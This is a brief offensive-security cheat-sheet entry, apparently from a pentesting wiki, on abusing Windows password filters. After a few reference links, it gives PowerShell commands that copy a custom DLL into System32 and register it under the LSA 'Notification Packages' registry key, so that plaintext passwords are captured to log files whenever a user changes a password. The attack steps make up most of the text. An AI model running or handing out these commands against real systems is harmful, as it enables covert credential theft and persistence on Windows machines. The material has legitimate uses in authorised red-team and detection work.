Password Filter

https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
https://github.com/clymb3r/Misc-Windows-Hacking/tree/master/HookPasswordChange
https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/
https://github.com/3gstudent/PasswordFilter

Abuse PasswordChangeNotify to load a custom DLL capturing plaintext credentials when a password change is performed (the passwords will appear in C:\logFile?.txt files):

PS > $passwordFilterName = (Copy-Item "Win32Project3.dll" -Destination "C:\Windows\System32" -PassThru).basename
PS > $lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
PS > $notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
PS > $notificationPackagesValues += $passwordFilterName
PS > Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
PS > Restart-Computer -Confirm

Last updated 3 years ago